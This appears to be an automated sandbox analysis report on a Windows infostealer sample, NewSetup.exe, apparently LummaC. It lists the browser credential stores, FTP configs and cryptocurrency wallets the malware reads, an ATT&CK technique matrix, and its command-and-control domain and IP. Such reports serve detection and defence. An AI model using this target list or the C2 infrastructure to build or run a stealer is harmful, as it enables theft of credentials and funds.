              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\NewSetup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: Yara matchFile source: Process Memory Space: NewSetup.exe PID: 5680, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: NewSetup.exe PID: 5680, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
ATT&CK matrix, listed per tactic in the original column order (a leading number is carried over from the original matrix cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 12 Windows Management Instrumentation; 1 Native API; 1 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 211 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 241 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 11 File and Directory Discovery; 33 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
NewSetup.exe | 37% | ReversingLabs | Win32.Packed.Generic
NewSetup.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://stingyerasjhru.click:443/apiicrosoft | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/gT | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/api5 | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click:443/api | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/apif# | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/9 | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/api | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/CTb | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/api: | 0% | Avira URL Cloud | safe
stingyerasjhru.click | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/ | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/apil6 | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/m | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/b | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/l | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click:443/apiault-release/key4.dbPK | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/bUT | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/l8T | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/a | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/e&TI | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/nT | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/apiox | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/apiJa | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/s | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/apiok | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/apiT | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/p | 0% | Avira URL Cloud | safe
https://stingyerasjhru.click/lJTm | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
stingyerasjhru.click | 172.67.157.249 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://stingyerasjhru.click/api | true | Avira URL Cloud: safe | unknown
stingyerasjhru.click | true | Avira URL Cloud: safe | unknown
hummskitnj.buzz | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
prisonyfork.buzz | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | NewSetup.exe | false | | high
https://stingyerasjhru.click/gT | NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net02 | NewSetup.exe | false | | high
https://stingyerasjhru.click/api5 | NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click:443/apiicrosoft | NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/api: | NewSetup.exe, 00000003.00000003.2167294440.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ | NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/apif# | NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click:443/api | NewSetup.exe, NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/9 | NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1& | NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/CTb | NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/ | NewSetup.exe, 00000003.00000003.2240923981.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241770608.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2216181199.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215827974.00000000059F1000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292228266.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2317817416.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059F3000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243756050.0000000005A01000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240356091.0000000003467000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2215760956.000000000346A000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2217240190.00000000059F4000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275417498.000000000346B000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/ts1ca.crl0 | NewSetup.exe | false | | high
https://support.mozilla.org/products/firefoxgro.all | NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.mozilla.or | NewSetup.exe, 00000003.00000003.2217185269.0000000005A31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/apil6 | NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.000000000344D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.entrust.net/rpa03 | NewSetup.exe | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aia.entrust.net/ts1-chain256.cer01 | NewSetup.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/l | NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/m | NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/l8T | NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/b | NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/bUT | NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2241164394.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click:443/apiault-release/key4.dbPK | NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/a | NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/e&TI | NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stingyerasjhru.click/apiox | NewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://stingyerasjhru.click/nT | NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                      https://stingyerasjhru.click/sNewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3NewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?NewSetup.exe, 00000003.00000003.2216330501.0000000005A35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://stingyerasjhru.click/pNewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://stingyerasjhru.click/apiJaNewSetup.exe, 00000003.00000003.2167189343.00000000033F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://stingyerasjhru.click/apiTNewSetup.exe, 00000003.00000003.2292186863.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://stingyerasjhru.click/apiokNewSetup.exe, 00000003.00000003.2273866612.000000000344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://stingyerasjhru.click/lJTmNewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://crl.entrust.net/2048ca.crl0NewSetup.exefalse
                                                                                              high
                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaNewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.entrust.net/rpa0NewSetup.exefalse
                                                                                                  high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.249 | stingyerasjhru.click | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581500
Start date and time: 2024-12-27 22:39:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NewSetup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/1@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 32
• Number of non-executed functions: 108
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: NewSetup.exe
Time | Type | Description
16:39:57 | API Interceptor | 8x Sleep call for process: NewSetup.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.157.249 | http://www.akagustos-kampanyasizlerle1.cloud/ | malicious | HTMLPhisher |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
stingyerasjhru.click | launcher.exe | malicious | LummaC | 104.21.58.80

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | ForcesLangi.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | iviewers.dll | malicious | LummaC | 104.21.60.24
CLOUDFLARENETUS | http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | launcher.exe | malicious | LummaC | 104.21.58.80
CLOUDFLARENETUS | Leside-.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | solara-executor.exe | malicious | Unknown | 172.67.75.163
CLOUDFLARENETUS | Setup.exe | malicious | Unknown | 104.21.2.114
CLOUDFLARENETUS | Setup.exe | malicious | Unknown | 104.21.2.114
CLOUDFLARENETUS | http://proxyium.com | malicious | Unknown | 104.21.80.92
